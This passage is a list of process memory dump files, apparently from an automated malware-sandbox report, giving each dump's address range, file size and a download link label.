memory/4596-277-0x0000000000400000-0x0000000000629000-memory.dmp

Filesize
2.2MB

Download
memory/4596-286-0x0000000000400000-0x0000000000629000-memory.dmp

Filesize
2.2MB

Download
memory/4704-159-0x0000000072410000-0x0000000072BC0000-memory.dmp

Filesize
7.7MB

Download
memory/4704-153-0x0000000000970000-0x00000000009FA000-memory.dmp

Filesize
552KB

Download
memory/4704-160-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/4764-241-0x00000000022E0000-0x0000000002340000-memory.dmp

Filesize
384KB

Download
memory/4784-174-0x0000000002E59000-0x0000000002E61000-memory.dmp

Filesize
32KB

Download
memory/4784-149-0x0000000002E59000-0x0000000002E61000-memory.dmp

Filesize
32KB

Download
memory/4784-175-0x0000000002DB0000-0x0000000002DB9000-memory.dmp

Filesize
36KB

Download
memory/4784-180-0x0000000000400000-0x0000000002C67000-memory.dmp

Filesize
40.4MB

Download
memory/5072-284-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5072-278-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5072-281-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5072-276-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5144-273-0x00000000021AB000-0x000000000223D000-memory.dmp

Filesize
584KB

Download
memory/5144-280-0x0000000002240000-0x000000000235B000-memory.dmp

Filesize
1.1MB

Download
memory/5168-266-0x0000000004020000-0x00000000047DE000-memory.dmp

Filesize
7.7MB

Download
memory/5284-245-0x0000000002140000-0x00000000021A0000-memory.dmp

Filesize
384KB

Download
memory/5304-252-0x0000000002140000-0x00000000021A0000-memory.dmp

Filesize
384KB

Download
memory/5320-261-0x00000000044A0000-0x0000000004C5E000-memory.dmp

Filesize
7.7MB

Download
memory/5344-254-0x000000000073D000-0x0000000000765000-memory.dmp

Filesize
160KB

Download
memory/5344-256-0x000000000073D000-0x0000000000765000-memory.dmp

Filesize
160KB

Download
memory/5344-258-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/5344-257-0x0000000001FC0000-0x0000000002004000-memory.dmp

Filesize
272KB

Download
memory/5448-287-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/5532-283-0x00000000007B0000-0x00000000007EE000-memory.dmp

Filesize
248KB

Download
memory/5532-285-0x00007FFBF39E0000-0x00007FFBF44A1000-memory.dmp

Filesize
10.8MB

Download
memory/5596-253-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/5596-249-0x00000000725E0000-0x0000000072D90000-memory.dmp

Filesize
7.7MB

Download
memory/5596-248-0x0000000000DB0000-0x0000000000DC8000-memory.dmp

Filesize
96KB

Download
memory/5648-271-0x00000000021D0000-0x00000000021D1000-memory.dmp

Filesize
4KB

Download
memory/5648-264-0x0000000002210000-0x0000000002246000-memory.dmp

Filesize
216KB

Download
memory/5648-270-0x0000000004D30000-0x0000000005358000-memory.dmp

Filesize
6.2MB

Download
memory/5648-262-0x00000000725E0000-0x0000000072D90000-memory.dmp

Filesize
7.7MB

Download
memory/5648-268-0x00000000021D2000-0x00000000021D3000-memory.dmp

Filesize
4KB

Download
memory/5784-263-0x00000000725E0000-0x0000000072D90000-memory.dmp

Filesize
7.7MB

Download
memory/5784-272-0x0000000004AF2000-0x0000000004AF3000-memory.dmp

Filesize
4KB

Download
memory/5784-269-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/6048-274-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/6048-265-0x00000000725E0000-0x0000000072D90000-memory.dmp

Filesize
7.7MB

Download
memory/6140-259-0x00000000725E0000-0x0000000072D90000-memory.dmp

Filesize
7.7MB

Download
memory/6140-267-0x00000000021B2000-0x00000000021B3000-memory.dmp

Filesize
4KB

Download
memory/6140-260-0x00000000021B0000-0x00000000021B1000-memory.dmp

Filesize
4KB

Download
memory/6208-349-0x0000000010000000-0x0000000010D56000-memory.dmp

Filesize
13.3MB

Download
memory/6592-321-0x00000000005E9000-0x00000000005F7000-memory.dmp

Filesize
56KB

Download
memory/6716-304-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/6780-339-0x000000000053D000-0x0000000000565000-memory.dmp

Filesize
160KB

Download
memory/6900-311-0x0000000000649000-0x00000000006B5000-memory.dmp

Filesize
432KB

Download
memory/6936-309-0x00000000011D0000-0x00000000011D2000-memory.dmp

Filesize
8KB

Download
memory/6936-307-0x0000000000100000-0x000000000049D000-memory.dmp

Filesize
3.6MB

Download
memory/6936-306-0x0000000000100000-0x000000000049D000-memory.dmp

Filesize
3.6MB

Download
memory/6944-373-0x0000000000400000-0x0000000000629000-memory.dmp

Filesize
2.2MB

Download
memory/7668-376-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/7668-382-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/7668-370-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/8184-366-0x00000000006D9000-0x00000000006E6000-memory.dmp

Filesize
52KB

Download